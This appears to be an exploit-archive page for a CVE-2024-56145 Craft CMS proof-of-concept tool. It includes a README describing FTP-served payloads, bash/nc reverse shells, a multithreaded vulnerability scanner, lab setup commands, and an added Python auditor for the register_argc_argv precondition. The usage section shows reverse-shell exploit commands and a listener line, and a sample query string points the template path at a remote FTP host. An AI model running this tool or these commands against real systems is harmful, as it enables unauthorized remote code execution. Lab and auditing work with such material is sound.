POC details: 837ef8197195b3656da48a7ef85905c69dacdae6

Source
Related vulnerability
Title: Craft CMS code injection vulnerability (CVE-2024-56145)
Description: Craft CMS is an open-source content management system (CMS) from Craft CMS. Craft CMS versions from 5.0.0-RC1 up to (but not including) 5.5.2 and from 4.0.0-RC up to (but not including) 4.13.2 contain a code injection vulnerability. The vulnerability arises when the `register_argc_argv` option in the php.ini configuration is enabled, which exposes an unspecified remote code execution vector.
Description
Unauthenticated RCE on CraftCMS when PHP `register_argc_argv` config setting is enabled
Introduction
# CVE-2024-56145: Craft CMS Exploitation Tool 🚨

This tool exploits a vulnerability in **Craft CMS** identified by the research team at [Assetnote](https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms). When PHP's `register_argc_argv` setting is enabled, the web SAPI populates `$_SERVER['argv']` from the HTTP query string, and Craft reads CLI-style options such as `--templatesPath` from there. An unauthenticated request can therefore point Craft's template path at a location the attacker controls (this tool serves it over FTP) and achieve **Remote Code Execution (RCE)** 🛠️. The fix shipped in Craft CMS 5.5.2 and 4.13.2; earlier 5.x and 4.x releases are affected only when `register_argc_argv` is on.

🙏 **Special thanks to Assetnote for their dedication to security and research.**

---

## ✨ Features

- 🚀 **Automated FTP server** to serve malicious payloads.
- 🧪 **Reverse shell payload generation** with multiple options (`bash`, `nc`).
- 🔍 **Vulnerability checker** to identify vulnerable targets.
- 🖥️ **Multithreaded support** for faster scans.
- 🛠️ **Easy-to-use CLI interface** with clear feedback.

---

## 🛡️ Setting Up a Vulnerable Lab

Follow these steps to set up a Craft CMS instance for testing purposes:

```bash
mkdir exploit-craft && \
cd exploit-craft && \
# Configure a DDEV project for Craft CMS
ddev config \
  --project-type=craftcms \
  --docroot=web \
  --create-docroot \
  --php-version="8.2" \
  --database="mysql:8.0" \
  --nodejs-version="20" && \
# Start the DDEV project
ddev start -y && \
# Create the Craft CMS project skeleton
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
# Pin a vulnerable CMS version (anything below 5.5.2 on the 5.x line; the fix shipped in 5.5.2 / 4.13.2)
ddev composer require "craftcms/cms:5.5.0" \
  --no-scripts \
  --no-interaction --with-all-dependencies && \
# Generate the Craft security key
ddev craft setup/security-key && \
# Install Craft CMS with throwaway admin credentials
ddev craft install/craft \
    --username=admin \
    --password=password123 \
    --email=admin@example.com \
    --site-name=Testsite \
    --language=en \
    --site-url='$DDEV_PRIMARY_URL' && \
# Enable register_argc_argv for PHP; this setting is the precondition for the bug
mkdir -p .ddev/php/ && \
echo "register_argc_argv = On" > .ddev/php/php.ini && \
# DDEV only applies .ddev/php/*.ini when the project (re)starts, so restart before testing
ddev restart && \
# Final step: echo a message and open the project
echo 'Nice, ready to launch!' && \
ddev launch
```
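The last step of the lab flips a single php.ini directive, and that directive is the whole precondition for the bug. As an added example (written for this page; it is not code from the exploit tool or from Craft CMS), the Python below audits a php.ini body for the effective value of `register_argc_argv` using PHP's documented INI boolean rules and compiled-in default, and reproduces how a web SAPI turns the raw query string into `$_SERVER['argv']` when the setting is on. The ini snippets and the query string are constructed samples, and `203.0.113.5` is a documentation-range placeholder address.

```python
"""
Audit helpers for the register_argc_argv precondition behind CVE-2024-56145.

Added example for this page; it is not code from the exploit tool or from
Craft CMS. It relies only on PHP's documented behaviour:
  * INI booleans: on/yes/true are true, off/no/false/none/"" are false,
    anything else is parsed as an integer (non-zero is true), case-insensitive;
  * the compiled-in default for register_argc_argv is "1" (On); only the
    shipped php.ini-production / php.ini-development templates set it Off;
  * under a web SAPI with the setting On, PHP builds $_SERVER['argv'] by
    splitting the raw (undecoded) query string on '+'.
"""
import re
from typing import List, Optional

# "key = value" with optional surrounding whitespace; ';' comments are
# stripped before this regex is applied, section headers never match it.
_INI_ASSIGNMENT = re.compile(r"^\s*([A-Za-z_][\w.]*)\s*=\s*(.*?)\s*$")


def php_ini_bool(value: str) -> bool:
    """Interpret an INI value the way PHP's zend_ini_parse_bool() does."""
    v = value.strip().strip("\"'").lower()
    if v in ("on", "yes", "true"):
        return True
    if v in ("off", "no", "false", "none", ""):
        return False
    m = re.match(r"[+-]?\d+", v)  # fallback: atoi(); non-zero means true
    return bool(int(m.group(0))) if m else False


def effective_register_argc_argv(ini_text: str) -> bool:
    """
    Effective value of register_argc_argv for one php.ini body.

    The last assignment wins, as in PHP, and lines commented out with ';'
    are ignored. If the directive never appears, the compiled default (On)
    applies, so a php.ini that merely deletes the line leaves the footgun armed.
    """
    result: Optional[bool] = None
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0]  # drop ';' comments, inline ones too
        m = _INI_ASSIGNMENT.match(line)
        if m and m.group(1).lower() == "register_argc_argv":
            result = php_ini_bool(m.group(2))
    return True if result is None else result


def query_string_to_argv(query_string: str) -> List[str]:
    """
    Reproduce how a web SAPI fills $_SERVER['argv'] when register_argc_argv
    is On: the raw query string is split on '+' with no URL decoding, and an
    empty query string yields an empty argv.
    """
    if not query_string:
        return []
    return query_string.split("+")


def cli_style_options(query_string: str) -> List[str]:
    """
    argv entries that look like long CLI options ('--name' or '--name=value').
    A normal web request has none, so seeing them in an access log is a cheap
    signal that someone is probing argv-reading code paths.
    """
    return [a for a in query_string_to_argv(query_string) if a.startswith("--")]


if __name__ == "__main__":
    # Constructed samples: the lab's one-line override, a hardened file, and
    # a file that omits the directive entirely.
    samples = {
        "lab php.ini": "register_argc_argv = On\n",
        "hardened": "; register_argc_argv = On\nregister_argc_argv = Off\n",
        "omitted": "memory_limit = 256M\n",
    }
    for name, body in samples.items():
        state = "On" if effective_register_argc_argv(body) else "Off"
        print(f"{name:12s} -> register_argc_argv = {state}")

    # Constructed query string of the shape this tool relies on: a CLI-style
    # option pointing the template path at a remote FTP location.
    qs = "--templatesPath=ftp://203.0.113.5/tpl"
    print("argv:", query_string_to_argv(qs))
    print("cli-style options:", cli_style_options(qs))
```

Two things the output makes concrete: a php.ini that simply omits the directive is On, because only the shipped php.ini templates turn it Off, and because the query string is split on `+` without decoding, a single `--option=value` survives intact, which is what lets a web request masquerade as a CLI invocation. The directive is `PHP_INI_PERDIR`, so when auditing a real host also check `.user.ini`, `.htaccess` and PHP-FPM pool files (`php_admin_flag`/`php_flag`), not just the main php.ini.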

---

## 🚨 Usage

Run the tool with the `--help` flag to view available commands:

```bash
python exploit.py --help
```

![](./img/help.png)

---

### 🚀 Exploit Command

To exploit a target:

```bash
python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>
```

![](./img/exploit.png)

#### ⚙️ Options:
- `-u` / `--url`: The target URL (required).
- `-lh` / `--lhost`: Your local IP for receiving the reverse shell (required).
- `-lp` / `--lport`: The local port for the listener (required).
- `-px` / `--payload`: Payload type (`bash`, `nc`). Default: `bash`.
- `-fh` / `-fp`: Host and port for the tool's built-in FTP server that serves the payload, as used in the example below (see `--help` for the long forms). The target must be able to reach this host, so `127.0.0.1` only works against a local lab such as the DDEV instance above.

#### 🧪 Example:
```bash
python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash
```

Start a listener on the chosen port (for example `nc -lvnp 4444`) before running the exploit so the reverse shell has somewhere to connect back to.

---

### 🔍 Check Command

To check whether a target is vulnerable, pass either a single URL or a file of URLs:

```bash
python exploit.py check -u <TARGET_URL>
python exploit.py check -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>
```

#### ⚙️ Options:
- `-u` / `--url`: A single target URL.
- `-f` / `--file`: A file containing multiple URLs to scan.
- `-t` / `--threads`: Number of concurrent threads for scanning.
- `-o` / `--output`: Output file to save results.

![](./img/check.png)

#### 🧪 Example:
```bash
python exploit.py check -f urls.txt -t 10 -o results.txt
```

Enjoy responsibly and ethically! ✨
File snapshot

```text
[4.0K]  /data/pocs/837ef8197195b3656da48a7ef85905c69dacdae6
├── [7.5K]  exploit.py
├── [4.0K]  img
│   ├── [ 33K]  check.png
│   ├── [368K]  exploit.png
│   └── [ 63K]  help.png
├── [3.3K]  README.md
└── [  60]  requirements.txt

1 directory, 6 files
```